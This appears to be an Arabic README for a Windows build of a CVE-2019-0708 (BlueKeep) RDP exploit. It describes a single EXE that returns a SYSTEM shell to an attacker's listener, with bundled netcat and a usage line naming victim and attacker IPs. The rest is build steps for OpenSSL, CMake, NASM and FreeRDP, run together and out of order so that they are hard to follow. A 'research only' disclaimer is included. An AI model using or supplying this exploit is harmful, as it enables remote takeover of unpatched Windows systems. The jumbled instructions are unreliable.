
CVE-2019-0708-EXP-إصدار Windows،إصدار ملف exe واحد،بعد التشغيل،يقوم بإرجاع شل (Shell) بصلاحيات النظام (System) مباشرة في وحدة التحكم الحالية.
يتم تقديم هذا الـ PoC من قبل المؤلف لأغراض بحثية فقط. إذا استخدم القارئ هذا الـ PoC في أي أنشطة أخرى، فهو مسؤول عنها شخصياً ولا يتحمل المؤلف أي مسؤولية.
[toc]
CVE-2019-0708-EXP (إصدار Windows) هو ملف EXE فردي يعمل مباشرة على Windows دون الحاجة إلى Linux أو Python أو Ruby. بعد التشغيل، يقوم بإنشاء شلّة (Shell) بصلاحيات System على وحدة التحكم الحالية.
تم تجميعه باستخدام نمط المكتبات الثابتة الكامل (static linking) لجميع ملفات DLL، مع تضمين netcat و openssl. يدعم شريط التقدم وعرض إخراج الشلّة.
CVE-2019-0708-EXP-Release.wfreerdp.exe /v:IP_Victim /l:IP_Attacker، على سبيل المثال: wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17E:\git\KernelResearch\FreeRDP-master\openssl.7z مباشرة إلى C:\openssl\ لاستخدام بيئة OpenSSL المجمعة مسبقاً.cmake-3.15.3-win64-x64.msi كمسؤول.C:\Program Files\CMake\bin إلى متغير البيئة PATH."C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txtFreeRDP-master-restore.7z.openssl-1.0.2s.tar.gz إلى C:\openssl\ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msiC:\Perl64\bin إلى متغير البيئة PATH.perl Configure VC-WIN64Acd /d C:\openssl\ms\do_win64anmake -f ms\ntdll.maknmake -f ms\nt.maknmake -f ms\ntdll.mak testnmake -f ms\nt.mak testnasm-2.14.02-installer-x64.exe كمسؤول.C:\Program Files\NASM إلى متغير البيئة PATH.nasmBuildCustomizations.rar إلى C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\.client -> common -> freerdp-client، انقر بزر الماوس الأيمن، اختر "Build Dependencies" -> "Build Customizations"، ثم حدد خيار nasm (وليس masm)..asm في مشروع freerdp-client وظهر خيار التجميع في قائمة السياق، فهذا يعني أن بيئة تجميع Nasm قد تم تثبيتها بنجاح.
المؤلف من شركة ZheJiang Guoli Security Technology، البريد الإلكتروني: [email protected]
nmake -f ms\ntdll.mak installnmake -f ms\nt.mak installnmake -f ms\ntdll.mak cleannmake -f ms\nt.mak cleanout32 وابحث عن ملفي libeay32.lib و ssleay32.lib، ثم انسخهما إلى C:\openssl\lib\.